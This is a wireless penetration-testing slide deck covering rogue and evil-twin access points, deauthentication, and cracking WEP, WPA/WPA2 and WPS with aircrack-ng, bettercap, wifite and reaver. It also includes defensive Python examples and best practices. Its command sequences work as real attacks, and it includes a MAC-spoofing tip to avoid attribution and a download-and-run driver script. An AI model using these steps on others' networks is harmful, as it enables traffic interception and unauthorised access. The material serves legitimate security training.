Wireless Penetration Testing
Agenda
WIRELESS PENETRATION TESTING
• Lab Setup
• Wi-Fi Network Fundamentals
• Wireless Packets
• Wi-Fi Network Interaction
• Wireless Reconnaissance
• Rogue Access points
• Cracking WEP
• Cracking WPA/WPA2
• WPS Attacks
• Security Best Practices
Lab Setup
Hardware requirements
• TP-Link WN722N
• Alfa AWUS036H
• Melon RTL8187L
• Alfa AWUS036NHA
• Panda PAU05
• Alfa AWUS036NEH
Hardware of my choice for this session:
TP-Link TL-WN722N Wi-Fi adapter
System Architecture
• Minimum system configuration
• Windows 10 on the host machine
• Machine specification: 4 GB to 8 GB RAM, 100 GB HDD or SSD, 2 CPUs
• Virtualisation platform
• VirtualBox (https://www.virtualbox.org/)
(or)
• VMware Workstation Player (https://www.vmware.com/in/products/workstation-player/workstation-player-evaluation.html)
• Guest OS to be installed inside the VM
• Kali Linux (https://www.kali.org/get-kali/#kali-platforms)
• The USB adapter must be attached to the VM (USB passthrough). The laptop's built-in Wi-Fi is presented to the guest as a virtual Ethernet card, so it cannot be put into monitor mode from inside the VM.
Software Requirements
• Aircrack-ng
• Wifite
• Bettercap
• John the Ripper
• Hashcat
• coWPAtty
• Kismet
• Fluxion
• WiFi-Pumpkin (wifipumpkin3)
Wi-Fi Network Fundamentals
IEEE 802.11
• IEEE 802.11 is part of the IEEE 802 set of local area network (LAN)
technical standards, and specifies the set of media access control (MAC)
and physical layer (PHY) protocols for implementing wireless local area
network (WLAN) computer communication.
• The standard and amendments provide the basis for wireless network
products using the Wi-Fi brand and are the world's most widely used
wireless computer networking standards.
• IEEE 802.11 is used in most home and office networks to allow laptops,
printers, smartphones, and other devices to communicate with each other
and access the Internet without connecting wires. IEEE 802.11 is also a
basis for vehicle-based communication networks with IEEE 802.11p.
IEEE 802.11 (Contd.)
• The standards are created and maintained by the Institute of Electrical and
Electronics Engineers (IEEE) LAN/MAN Standards Committee (IEEE 802).
• The base version of the standard was released in 1997 and has had subsequent
amendments. While each amendment is officially revoked when it is incorporated
in the latest version of the standard, the corporate world tends to market to the
revisions because they concisely denote the capabilities of their products.
• IEEE 802.11 uses various frequencies including, but not limited to, 2.4 GHz,
5 GHz, 6 GHz, and 60 GHz frequency bands. Although IEEE 802.11 specifications
list channels that might be used, the radio frequency spectrum availability
allowed varies significantly by regulatory domain.
• The protocols are typically used in conjunction with IEEE 802.2, and are designed
to interwork seamlessly with Ethernet, and are very often used to carry Internet
Protocol traffic.
Standards and Amendments
Standards and Amendments(Contd.)
In Process Standards
Wireless Lan: 802.11 Standards Comparison
Wi-Fi 7 is expected to launch in the second half of 2024; Wi-Fi 6 is the generation currently in use.
Basic Terminologies
Basic Terminologies(Contd.)
Access Point (AP)
• AP is a networking hardware device that allows other Wi-Fi devices to
connect to a wired network.
• As a standalone device, the AP may have a wired connection to a router,
but, in a wireless router, it can also be an integral component of the router
itself.
Service Set Identifier (SSID)
• A service set identifier (SSID) is a sequence of up to 32 bytes that names a wireless local area network (WLAN).
• An SSID is sometimes referred to as a "network name". This name lets stations pick the desired network when multiple independent networks operate in the same physical area.
• The SSID is not guaranteed to be unique: nothing stops a second access point from advertising the same name, which is exactly what the rogue AP and evil twin attacks later in this deck rely on.
Basic Terminologies(Contd.)
Basic Service Set Identifier (BSSID)
• The MAC address of the access point radio (or wireless router) that stations associate with. An AP serving several SSIDs normally advertises one BSSID per SSID.
Extended Service Set Identifier (ESSID)
• An extended service set (ESS) is a wireless network formed by multiple access points that appears to users as a single, seamless network, such as one covering a home or office too large for reliable coverage by a single AP. The ESSID is the SSID shared by all the APs in the ESS.
Roaming
• Wi-Fi roaming occurs when a wireless client device moves outside the usable range of one router or access point (AP) and associates with a different AP in the same ESS.
Basic Terminologies(Contd.)
Channel
• A Wi-Fi channel is the frequency range on which a router or AP transmits. Most routers and devices support several bands, the most common being 2.4 GHz and 5 GHz. Each band is divided into numbered channels (1 to 14 in 2.4 GHz, depending on regulatory domain); airodump-ng, aireplay-ng and airbase-ng take the channel number with -c.
Data Rate
• Data rates depend on the modulation type, channel width and number of spatial streams; typical advertised values are 200 Mbps, 400 Mbps, 433 Mbps, 600 Mbps and 867 Mbps.
Beacon
• Wi-Fi beacons are short, regular management frames (by default about every 100 ms) that access points (APs) transmit to announce the SSID, channel, supported rates and security settings to nearby clients. Clients use beacons to decide which AP to connect to. Beacons are never encrypted, which is why reconnaissance tools can list every network in range without knowing any key.
Wireless Operating modes
Wireless Operating modes (Contd.)
• Managed - The normal client (station) mode: the interface associates with an access point and sends and receives only its own traffic. This is the mode NetworkManager leaves a card in.
• Ad-hoc - Ad-hoc mode refers to a wireless network structure where devices communicate directly with each other, without an access point. This type of wireless network is also called peer-to-peer mode.
• Master - When your wireless card is in master mode it acts as an access point, transmitting beacons and serving clients. hostapd-based tools such as wifipumpkin3 use this mode; airbase-ng instead emulates an AP by injecting frames from monitor mode.
• Monitor - Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to capture all 802.11 frames seen on a channel without associating to any network. Most of the attacks in this deck need it, and not every adapter or driver supports it (hence the hardware list above).
• Auto - the driver chooses the mode; this is the default for most interfaces.
TP-Link TL-WN722N Driver Software
installation:
• These steps are for the v2/v3 hardware revisions, which use a Realtek RTL8188EUS chipset and need the out-of-tree driver. The v1 revision uses an Atheros AR9271 and works with the in-kernel ath9k_htc driver without any of this.
• sudo apt update
• sudo apt upgrade
• sudo apt dist-upgrade
• sudo reboot
• sudo apt install bc build-essential libelf-dev linux-headers-amd64
• echo "blacklist r8188eu" | sudo tee /etc/modprobe.d/realtek.conf   [disable the in-kernel r8188eu driver, which lacks usable monitor-mode and injection support]
• sudo reboot
• git clone https://github.com/aircrack-ng/rtl8188eus
• cd rtl8188eus
• sh -c "$(wget -O- https://gitlab.com/KanuX/rtl8188eus/-/raw/master/scripts/build.sh)"
• The last command downloads a build script from a third-party repository and executes it directly. Fetch it first (wget -O build.sh <that URL>), read it, and only then run it: it runs with your privileges and installs a kernel module.
Monitor Mode
• Start the Kali OS in VMware or VirtualBox
• Plug in the USB TP-Link wireless adapter (TL-WN722N) and attach it to the VM
• Run the following command to list the wireless interfaces and their current mode
• iwconfig
Monitor Mode(Contd.)
• By default it will be in Auto or Managed mode
• Run the following commands to switch to monitor mode
• sudo airmon-ng check kill   [stops NetworkManager, wpa_supplicant and dhclient, which would otherwise reset the interface in the middle of a capture]
• sudo airmon-ng start wlan0
• iwconfig   [verify Mode:Monitor; recent airmon-ng versions rename the interface to wlan0mon, so substitute that name for wlan0 in the commands that follow]
• To disable monitor mode run sudo airmon-ng stop wlan0mon
• Restart NetworkManager: sudo systemctl start NetworkManager
Monitor Mode(Contd.)
Wireless Packets – IEEE 802.11 Mac Frame
Structure
Wireless Packet Types
Analyzing Packets using Wireshark
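The frame-structure and packet-type slides above are images that did not survive extraction. As an added example (not from the deck), the Python below parses the 802.11 MAC header and the two management frames this deck leans on most: beacons, which reconnaissance tools read, and deauthentication frames, which the aireplay-ng and bettercap deauth attacks forge. The frames are constructed inline; the BSSID c0:a0:bb:11:22:33, the station 3c:5a:37:aa:bb:cc, the SSID and the channel are made-up values.

```python
import struct

TYPE_NAMES = {0: "management", 1: "control", 2: "data"}
MGMT_SUBTYPES = {0: "assoc-req", 1: "assoc-resp", 4: "probe-req", 5: "probe-resp",
                 8: "beacon", 10: "disassoc", 11: "auth", 12: "deauth"}


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_80211(frame):
    """Parse one 802.11 management/data frame (radiotap header already stripped)."""
    fc, duration = struct.unpack_from("<HH", frame, 0)
    ftype, subtype, flags = (fc >> 2) & 0x3, (fc >> 4) & 0xF, fc >> 8
    info = {
        "type": TYPE_NAMES.get(ftype, "reserved"),
        "subtype": subtype,
        "to_ds": bool(flags & 0x01),
        "from_ds": bool(flags & 0x02),
        "protected": bool(flags & 0x40),  # Protected Frame bit: body is WEP/TKIP/CCMP encrypted
        "duration": duration,
        "addr1": mac_str(frame[4:10]),    # receiver address
        "addr2": mac_str(frame[10:16]),   # transmitter address
        "addr3": mac_str(frame[16:22]),   # BSSID for management frames
    }
    seq_ctl = struct.unpack_from("<H", frame, 22)[0]
    info["seq"], info["frag"] = seq_ctl >> 4, seq_ctl & 0xF
    body = frame[24:]
    if ftype == 0:
        info["subtype_name"] = MGMT_SUBTYPES.get(subtype, f"mgmt-{subtype}")
        if subtype == 8:
            info.update(parse_beacon_body(body))
        elif subtype in (10, 12):
            # disassoc/deauth carry only a 2-byte reason code and, without 802.11w,
            # are not authenticated: anyone can forge them with the AP's address
            info["reason_code"] = struct.unpack_from("<H", body, 0)[0]
    return info


def parse_beacon_body(body):
    """Beacon fixed fields (timestamp, interval, capability) and tagged parameters."""
    _timestamp, interval, cap = struct.unpack_from("<QHH", body, 0)
    out = {"beacon_interval_tu": interval,
           "privacy": bool(cap & 0x0010),   # capability Privacy bit: some encryption is on
           "ssid": None, "channel": None, "rsn": False}
    pos = 12
    while pos + 2 <= len(body):
        tag, length = body[pos], body[pos + 1]
        val = body[pos + 2:pos + 2 + length]
        if tag == 0:
            out["ssid"] = val.decode("utf-8", "replace")
        elif tag == 3 and length == 1:
            out["channel"] = val[0]
        elif tag == 48:                     # RSN IE present: WPA2/WPA3 parameters
            out["rsn"] = True
        pos += 2 + length
    return out


# --- constructed sample frames (not real captures) ---------------------------

def build_mgmt(subtype, addr1, addr2, addr3, body, seq=0):
    fc = subtype << 4                       # protocol version 0, type 0 (management), no flags
    return struct.pack("<HH", fc, 0) + addr1 + addr2 + addr3 + struct.pack("<H", seq << 4) + body


def build_beacon(bssid, ssid, channel, privacy=True, rsn=True):
    cap = 0x0001 | (0x0010 if privacy else 0)          # ESS bit, optional Privacy bit
    fixed = struct.pack("<QHH", 0, 100, cap)           # timestamp, 100 TU interval, capabilities
    tags = bytes([0, len(ssid)]) + ssid.encode()       # tag 0: SSID
    tags += bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])      # tag 1: basic rates 1/2/5.5/11 Mbps
    tags += bytes([3, 1, channel])                     # tag 3: DS parameter set (channel)
    if rsn:
        # tag 48: RSN IE, version 1, group CCMP, pairwise CCMP, AKM PSK, capabilities 0
        rsn_ie = bytes.fromhex("0100000fac040100000fac040100000fac020000")
        tags += bytes([48, len(rsn_ie)]) + rsn_ie
    return build_mgmt(8, b"\xff" * 6, bssid, bssid, fixed + tags)


AP_MAC = bytes.fromhex("c0a0bb112233")       # constructed BSSID
CLIENT_MAC = bytes.fromhex("3c5a37aabbcc")   # constructed station
SAMPLE_BEACON = build_beacon(AP_MAC, "tplink", 6)
# A forged deauth as an attacker injects it: "from" the AP to the client, reason code 7
SAMPLE_DEAUTH = build_mgmt(12, CLIENT_MAC, AP_MAC, AP_MAC, struct.pack("<H", 7), seq=1)

if __name__ == "__main__":
    for f in (SAMPLE_BEACON, SAMPLE_DEAUTH):
        print(parse_80211(f))
```

Real frames can be fed in by exporting packet bytes from Wireshark with the radiotap header removed; the Privacy bit and RSN tag together are what airodump-ng condenses into its ENC/CIPHER/AUTH columns.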
Wi-Fi Network Interaction
Wi-Fi Authentication Methods
Wireless Encryption Protocols
(WEP/WPA/WPA2)
WPA2 Authentication & Keys
WPA2 Personal and Enterprise
WPS (Wi-Fi Protected Setup)
Authentication
Wireless Reconnaissance
• Tools required: bettercap, airodump-ng and Kismet
• In bettercap, run the following commands (bettercap needs root; its wifi module switches the interface to monitor mode itself when recon starts)
• Choose the interface at start-up: sudo bettercap --iface wlan0
• help wifi
• wifi.recon on
• wifi.show
• wifi.recon off
Wireless Reconnaissance with Bettercap
Wardriving with Kismet (Just for reference)
• This only works while moving (driving, walking or otherwise roaming) through multiple locations, so that Wi-Fi hotspots are captured together with GPS coordinates.
• Hardware required - Car, Laptop, Android Phone, Wifi Adapter
• Software Required – Kismet, GPSD, ADB, Share GPS (AndroidApp),
Google Earth
• Reference blog link - https://veteransec.org/wifi-hacking-wardriving-
with-an-android-phone-and-raspberry-pi-3/
Wardriving with WiGLE
Wireless Reconnaissance with Airodump-ng
Rogue Access points requirements
• Tools required: airodump-ng, airbase-ng, airmon-ng and wifipumpkin3
• wifipumpkin3 installation
• git clone https://github.com/P0cL4bs/wifipumpkin3
• https://wifipumpkin3.github.io/docs/getting-started#installation
• dnsmasq (DHCP and DNS server for the rogue AP's clients)
• sudo apt-get install dnsmasq -y
Creation of Rogue AP using Wi-Fi Pumpkin 3
• Plug in the wireless adapter; wifipumpkin3 does not need monitor mode enabled beforehand (it runs the AP through hostapd). Run the following commands
• sudo wifipumpkin3
• set interface wlan0
• set ssid hello
• set proxy noproxy
• start
• This creates a rogue AP with the name "hello"
Creation of Rogue AP using Wi-Fi Pumpkin 3
(Contd.)
• Once any device connects to the rogue AP "hello", all of its traffic passes through our machine and can be intercepted. In an evil twin attack the rogue AP copies a legitimate network's SSID so that clients join it by mistake or by auto-reconnecting after a deauth. Only unencrypted traffic is readable as-is; TLS sessions still reveal hostnames (DNS queries, SNI) but not their content.
Creation of Rogue AP using Air-ng tools
• airodump-ng wlan0   [note the channel and SSID of the network to imitate]
• airbase-ng -c 11 -e tplink -s -W 1 wlan0   [fake AP "tplink" on channel 11; -W 1 sets the WEP flag in beacons, -s forces shared-key authentication]
• airodump-ng -c 11 --bssid <bssid of the newly created tplink AP> -w 1 wlan0
• For an evil twin/MITM attack we also need dnsmasq
• airbase-ng -e TP-Link -c 8 wlan0   [create the fake AP for the evil twin attack]
• airbase-ng creates a tap interface at0 through which the fake AP's clients reach the Kali host
sudo geany /etc/dnsmasq.conf
interface=at0
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1   # option 3: default gateway handed to clients
dhcp-option=6,10.0.0.1   # option 6: DNS server handed to clients (dnsmasq itself)
server=8.8.8.8           # upstream resolver for forwarded queries
log-queries
log-dhcp
listen-address=127.0.0.1
Creation of Rogue AP using Air-ng tools
(Contd.)
Run the commands below in a separate terminal, as root
• ifconfig at0 up
• ifconfig at0 10.0.0.1 netmask 255.255.255.0   [assigning the address also installs the 10.0.0.0/24 route on at0; no separate route add is needed]
• iptables -P FORWARD ACCEPT
• iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE   [-o must name the interface with Internet access (eth0 here); not wlan0, which airbase-ng is using in monitor mode]
• echo '1' > /proc/sys/net/ipv4/ip_forward
• dnsmasq -C /etc/dnsmasq.conf -d
• Connect any device now; its traffic is visible on at0 (e.g. wireshark -i at0) and its DNS lookups appear in the dnsmasq output because of log-queries
Sniffing with Dnsmasq
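What an auditor, or a defender, does with the airodump-ng output from the reconnaissance section once a rogue AP like the one just built is on the air: the added Python below (not part of the deck) reads the access-point table of the <prefix>-01.csv file that airodump-ng -w writes and flags WEP and open networks, locally administered BSSIDs, and an ESSID advertised by several BSSIDs with disagreeing security settings, which is how the open "tplink" evil twin created above looks next to the real WPA2 "tplink". The CSV text is constructed to follow airodump-ng's column layout; that layout, and every address and network name in it, are assumptions rather than a real capture.

```python
import csv
from collections import Counter, defaultdict

# Constructed sample in airodump-ng's CSV layout (assumed layout, not a real capture).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
C0:A0:BB:11:22:33, 2024-05-01 10:00:01, 2024-05-01 10:09:59,  6,  130, WPA2, CCMP, PSK, -41,      320,        0,   0.  0.  0.  0,   6, tplink,
C0:A0:BB:11:22:34, 2024-05-01 10:00:03, 2024-05-01 10:09:58,  6,  130, WPA2, CCMP, PSK, -44,      318,        0,   0.  0.  0.  0,   6, tplink,
02:00:00:DE:AD:01, 2024-05-01 10:05:10, 2024-05-01 10:09:59,  8,   54, OPN,     ,    , -30,      150,        0,   0.  0.  0.  0,   6, tplink,
00:1D:7E:AA:BB:CC, 2024-05-01 10:00:02, 2024-05-01 10:09:57, 11,   54, WEP, WEP,     , -60,      290,     1204,   0.  0.  0.  0,   5, hello,
C8:3A:35:01:02:03, 2024-05-01 10:00:05, 2024-05-01 10:09:59,  1,   54, OPN,     ,    , -70,      295,        0,   0.  0.  0.  0,   9, CoffeeNet,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
3C:5A:37:AA:BB:CC, 2024-05-01 10:05:12, 2024-05-01 10:09:59, -35,       88, 02:00:00:DE:AD:01, tplink
"""


def parse_airodump_aps(text):
    """Return the access-point rows of an airodump-ng CSV; the station table that
    follows the first blank line after the header is ignored."""
    aps, header = [], None
    for line in text.splitlines():
        if not line.strip():
            if header is not None:
                break
            continue                       # real files start with an empty line
        fields = [f.strip() for f in next(csv.reader([line]))]
        if header is None:
            header = fields
            continue
        row = dict(zip(header, fields))
        aps.append({"bssid": row["BSSID"].lower(), "channel": int(row["channel"]),
                    "privacy": row["Privacy"], "cipher": row["Cipher"],
                    "auth": row["Authentication"], "essid": row["ESSID"]})
    return aps


def profile(ap):
    return (ap["privacy"], ap["cipher"], ap["auth"])


def audit(aps):
    """Return (bssid, essid, code, detail) findings for weak or suspicious APs."""
    findings = []
    by_essid = defaultdict(list)
    for ap in aps:
        if ap["privacy"] == "WEP":
            findings.append((ap["bssid"], ap["essid"], "WEP",
                             "WEP key is recoverable from captured IVs (aircrack-ng)"))
        elif ap["privacy"] == "OPN":
            findings.append((ap["bssid"], ap["essid"], "OPEN",
                             "no encryption; client traffic is readable over the air"))
        # Bit 1 of the first octet = locally administered address: not burned in by a
        # vendor, typical of software APs and MAC-changed adapters (weak signal alone).
        if int(ap["bssid"][:2], 16) & 0x02:
            findings.append((ap["bssid"], ap["essid"], "LOCAL_MAC",
                             "BSSID is locally administered, not a vendor OUI"))
        if ap["essid"]:
            by_essid[ap["essid"]].append(ap)
    # Evil twin heuristic: one ESSID, several BSSIDs, and a security profile that
    # disagrees with the majority (e.g. an open clone of a WPA2 network). With only
    # two BSSIDs there is no majority; the first one seen is then taken as reference.
    for essid, group in by_essid.items():
        if len(group) < 2:
            continue
        majority = Counter(profile(ap) for ap in group).most_common(1)[0][0]
        for ap in group:
            if profile(ap) != majority:
                findings.append((ap["bssid"], essid, "EVIL_TWIN",
                                 f"security {ap['privacy']} differs from the other "
                                 f"{len(group) - 1} BSSID(s) advertising this ESSID "
                                 f"({majority[0]}); seen on channel {ap['channel']}"))
    return findings


if __name__ == "__main__":
    for bssid, essid, code, detail in audit(parse_airodump_aps(SAMPLE_CSV)):
        print(f"{code:10} {bssid} {essid!r}: {detail}")
```

The station table at the bottom of the same file links clients to BSSIDs, so the same parser extended to that section shows which real users have already joined the twin.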
Cracking WEP
Create a rogue access point with the WEP cipher
• airbase-ng -c 11 -e hello -w 31:32:33:34:35 wlan0   [WEP-enabled fake AP "hello" with the 40-bit key 31:32:33:34:35, i.e. the ASCII string "12345"]
Use the same dnsmasq config here
• ifconfig at0 up
• ifconfig at0 10.0.0.1 netmask 255.255.255.0
• iptables -P FORWARD ACCEPT
• iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE   [eth0 = the interface with Internet access, not the adapter running airbase-ng]
• echo '1' > /proc/sys/net/ipv4/ip_forward
• dnsmasq -C /etc/dnsmasq.conf -d
• Connect a device to the WEP fake AP with the key 12345
• airodump-ng wlan0   [to check whether the fake AP is up]
Cracking WEP(Contd.)
• Deauthentication attack with aireplay-ng
• aireplay-ng --deauth 0 -a <mac address of fake AP> -c <mac address of connected client> wlan0   [--deauth 0 sends deauth frames until stopped with Ctrl-C; use a small count such as 5 to only force a reconnect]
• Deauthentication attack with bettercap
• bettercap --iface wlan0
• wifi.recon on, then wifi.show
• wifi.deauth <mac address of fake AP>
• Macchanger (optional: give the adapter a random MAC before the fake authentication below so the attack is not tied to your real hardware address)
• ifconfig wlan0 down
• macchanger -r wlan0
• ifconfig wlan0 up
Cracking WEP(Contd.)
• airodump-ng to write the capture file with the WEP traffic
• airodump-ng -c 11 --bssid <mac address of fake AP> -w wepcrack wlan0   [writes wepcrack-01.cap; the #Data column counts captured IVs]
• Fake authentication (associate our adapter with the AP so it accepts our injected frames)
• aireplay-ng --fakeauth 60 -e hello -a <mac address of fake AP> -h <mac address of wlan0> wlan0
• ARP request replay attack (captures an ARP request and re-injects it so the AP answers with a new IV every time)
• aireplay-ng --arpreplay -e hello -a <mac address of fake AP> -h <mac address of wlan0> wlan0
• Perform the deauth attack again to make the client re-ARP, which gives aireplay-ng an ARP request to replay
• aireplay-ng --deauth 0 -a <mac address of fake AP> -c <mac address of connected client> wlan0
• Stop the deauth
• Crack the captured WEP file using aircrack-ng
• aircrack-ng wepcrack-01.cap   [recovers the WEP key once enough unique IVs are in the file, typically tens of thousands for a 104-bit key; aircrack-ng retries automatically every 5000 new IVs while airodump-ng keeps writing]
Cracking WEP(Contd.)
Cracking WEPDUMP File using Aircrack-ng
Cracking WEP using Wifite
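The deck gives the WEP procedure without saying why collecting IVs works. As an added example, not from the slides, the Python below implements RC4 and WEP framing and shows the property the attack rests on: the 24-bit IV travels in the clear, so two frames with the same IV share keystream, and the fixed LLC/SNAP header at the start of every data frame yields keystream bytes for free. aircrack-ng's PTW attack uses those known keystream bytes statistically over tens of thousands of IVs (no collision is needed); ARP replay exists only to make the AP emit fresh IVs quickly. The key 12345 (the 31:32:33:34:35 from the airbase-ng slide), the IV and all frames here are constructed.

```python
import math
import struct
import zlib


def rc4(key, n):
    """Plain RC4 (KSA + PRGA): return n keystream bytes for key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key, iv, plaintext):
    """WEP frame body: IV(3) || key-id(1) || RC4_{IV||key}(plaintext || CRC32 ICV)."""
    data = plaintext + struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + b"\x00" + xor(data, rc4(iv + wep_key, len(data)))


def wep_decrypt(wep_key, body):
    """Return (plaintext, icv_ok) for a WEP body produced by wep_encrypt."""
    iv, ct = body[:3], body[4:]
    data = xor(ct, rc4(iv + wep_key, len(ct)))
    plain, icv = data[:-4], data[-4:]
    return plain, struct.unpack("<I", icv)[0] == (zlib.crc32(plain) & 0xFFFFFFFF)


# Every 802.11 data frame starts with this LLC/SNAP header, so the first keystream
# bytes under any IV are known to an eavesdropper who does not have the key.
LLC_SNAP = bytes.fromhex("aaaa03000000")


def keystream_from_known_plaintext(body, known_plaintext):
    """IV is cleartext (bytes 0-2); XORing known plaintext into the ciphertext yields keystream."""
    return body[:3], xor(body[4:4 + len(known_plaintext)], known_plaintext)


def decrypt_with_reused_iv(body_known, known_plaintext, body_other):
    """Two frames under one IV share keystream: C1^P1 gives it, C2^keystream gives P2
    (as many bytes as the known plaintext is long)."""
    if body_known[:3] != body_other[:3]:
        raise ValueError("frames do not share an IV")
    _, ks = keystream_from_known_plaintext(body_known, known_plaintext)
    return xor(body_other[4:], ks)


def frames_until_iv_collision(probability=0.5, iv_bits=24):
    """Birthday bound: frames needed before some IV repeats with the given probability."""
    return math.sqrt(2 * (2 ** iv_bits) * math.log(1 / (1 - probability)))


# Constructed demo using the key from the airbase-ng -w 31:32:33:34:35 slide ("12345").
WEP_KEY = b"12345"
IV = b"\x01\x02\x03"
# ARP request: EtherType 0806, then the fixed ARP header; addresses zeroed for brevity
ARP_REQUEST = LLC_SNAP + bytes.fromhex("0806") + bytes.fromhex("0001080006040001") + bytes(20)
SECRET_FRAME = LLC_SNAP + bytes.fromhex("0800") + b"payload an attacker should not read"
CT_ARP = wep_encrypt(WEP_KEY, IV, ARP_REQUEST)
CT_SECRET = wep_encrypt(WEP_KEY, IV, SECRET_FRAME)   # same IV reused by the AP

if __name__ == "__main__":
    iv, ks = keystream_from_known_plaintext(CT_SECRET, LLC_SNAP)
    print("IV", iv.hex(), "keystream bytes recovered without the key:", ks.hex())
    print(decrypt_with_reused_iv(CT_ARP, ARP_REQUEST, CT_SECRET))
    print(f"~{frames_until_iv_collision():.0f} frames for a 50% chance of an IV repeat")
```

A busy AP sends a few thousand frames a minute, so the 2^24 IV space repeats within minutes even before any replay; the CRC32 ICV adds no protection because it is linear and not keyed.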
Cracking WPA/WPA2
Password Wordlists (Seclists)
Password Wordlists (Weakpass.com)
Password Wordlists (wiki.skullsecurity.org)
Capture the WPA/WPA2 Handshake file
• Run the following commands:
• sudo airmon-ng start wlan0   [put the wireless adapter in monitor mode]
• sudo airodump-ng wlan0   [list all APs in range; note the channel and BSSID of the target]
• sudo airodump-ng -c 6 --bssid <mac address of WPA AP> -w wpacracking wlan0   [lock onto the AP's channel and write wpacracking-01.cap]
• Force a fresh 4-way handshake: either deauthenticate a connected client (aireplay-ng --deauth 5 -a <bssid> -c <client mac> wlan0, as in the WEP section) or simply disconnect and reconnect your own mobile device to that AP. airodump-ng prints "WPA handshake: <bssid>" in its top line once it has captured enough of the EAPOL exchange (messages 2 and 3 are sufficient).
• aircrack-ng wpacracking-01.cap -w /usr/share/dict/wordlist-probable.txt   [pass the wordlist with the handshake file; from here the attack is offline and needs no further contact with the AP]
Capture the WPA/WPA2 Handshake
file(Contd.)
Cracking WPA/WPA2 using John the Ripper
• john --wordlist=/usr/share/dict/wordlist-probable.txt --rules --stdout | aircrack-ng -e tplink -w - wpacracking-01.cap
• John applies its mangling rules to the wordlist and streams the candidates (--stdout) into aircrack-ng, which reads them from stdin (-w -); -e selects the target ESSID inside the capture.
Cracking WPA/WPA2 using Wifite
• wifite --wpa
• Before starting the attack, make sure a client device is connected to the target AP: the handshake can only be captured when a client (re)authenticates, and wifite deauthenticates clients to trigger it.
Cracking WPS
Cracking WPS (PIN attacks)
• wifite --wps   [using wifite]
• reaver -i wlan0mon -b <bssid> -vv -L -N -c 1 -K   [using reaver: -i monitor interface, -b target BSSID, -c channel, -vv verbose, -L ignore the lock state the AP reports, -N do not send NACKs, -K Pixie Dust attack]
• The WPS PIN has eight digits but is verified in two halves (4 digits, then 3 digits plus a checksum digit), so online brute force needs at most about 11,000 attempts. Pixie Dust recovers the PIN offline from a single exchange when the AP's WPS implementation uses weak nonces. Most current APs rate-limit or lock WPS after a few failures; -L only ignores the reported lock state, a real lock-out still stops the online attack.
Next-Gen Wireless Assessment tools
Wi-Fi Pineapple
Security Best Practices
• Change default passwords (both the admin interface and the Wi-Fi passphrase)
• Restrict access to authorized users
• Encrypt the data on your network: use WPA2 (AES/CCMP) or WPA3, never WEP or TKIP, and pick a long passphrase that is not in any wordlist, since WPA2-PSK cracking is an offline dictionary attack on the captured handshake
• Disable WPS, or at least its PIN method
• Protect your Service Set Identifier (SSID)
• Install a firewall
• Maintain antivirus software
• Use file sharing with caution
• Keep your access point software patched and up to date
• Check your internet provider's or router manufacturer's wireless security options
• Connect using a Virtual Private Network (VPN)
Reference blog link - https://www.cisa.gov/uscert/ncas/tips/ST05-003
THANK YOU !

My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 

Recently uploaded (20)

Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
